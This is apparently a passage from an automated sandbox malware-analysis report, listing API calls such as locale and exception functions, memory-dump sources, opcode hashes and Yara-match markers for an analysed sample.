                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,05B7B984,00000000,?,00000008,?,?,05B83766,00000000), ref: 05B7BBB6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                              • Instruction ID: b136ca5e7b3355e9635c455addf3da298b1434daece477fd1283dfc9da8ec4eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FB139316146089FD719CF28C48AB657BE1FF45364F25C698E8AACF2A1D735E982CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                              • Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FDF
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FEC
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05B80829
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                              • Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                              • Instruction ID: a3ecf205f547aa61104667c81b925a43eb5a7b115932b567c3d1dba6ff3b641c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A21747261420E9BEB24BE24DC49F7A73A8EF44390F1011FAE915D6140E775F988CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                              • Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                              • Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 05B804CF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                              • Instruction ID: d1dad0edc087176ad74a43a1f135289fe7f2ddec48d442facdfa72e74bae8b8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A1159362007098FDB18BF39C898ABAB7A2FF80358B18443CE98647B00D371B442C740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                              • Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,05B807A3,00000000,00000000,?), ref: 05B80A31
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                              • Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                              • Instruction ID: 54619cb7cbdc52d264ec5a95161c3453a68fc8a36d9deef56e1f5edff74440bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F0F93261111AAFDB34BA64CC0DBBA7769FB40794F0514E9ED1AA3140EA74FE45C6D0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                              • Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                              • Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FDF
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FEC
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05B80829
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                              • Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
                                                                                                                                                                                                                              • Instruction ID: d6ba77d00d493223bd44a1de02fde750c06aeaa86577a77db3a7c0717fe9cf3d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F08132B51209ABDB14BF64DC49EBA73A8DB44350F0001F9E916DB240DA74BD49C7D4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 05B80544
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                              • Instruction ID: 833f9d2bfefc0f19d8eb85d3addca2dafefa9350fd8a174bbf182324f824afb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FF0F4323003095FDB24BE399C88ABA7B91FB80398B0540A9E9068B540D671E845CA50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                              • Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,05B74002,?,00000004), ref: 05B7779E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                              • Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
                                                                                                                                                                                                                              • Instruction ID: d12cda0c9645ea1adbac9e7c3ea85494b140965e92e2a36e5cb11c59ca2e7c11
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6F06D3174121CBBDF11AF64EC05F7E7B66EB04B11F9001B9FC1966250CA716A249A99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B71C62: RtlEnterCriticalSection.NTDLL(?), ref: 05B71C71
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 05B77390
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                              • Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                              • Instruction ID: 051fb0ff92f28a6f4b8a5e6ea4bf261e9d5b978f534f4fc092b7bf7fd0f1e048
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F04F32A503089FDB14EF78DC49B5D77F0EB04714F11516AF514DB2A0CF7469449B4A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                              • Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                              • Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 05B80449
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                              • Instruction ID: fa49f86da3e328d87545ca81284dc789a1abd805940825d9cfc5542698ff79f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66F05C3530020957CB04BF35DC09B7A7FD1FFC1754B4A4099EE058B240C631A842C790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                              • Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00409C12,05B695DF), ref: 05B69E72
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
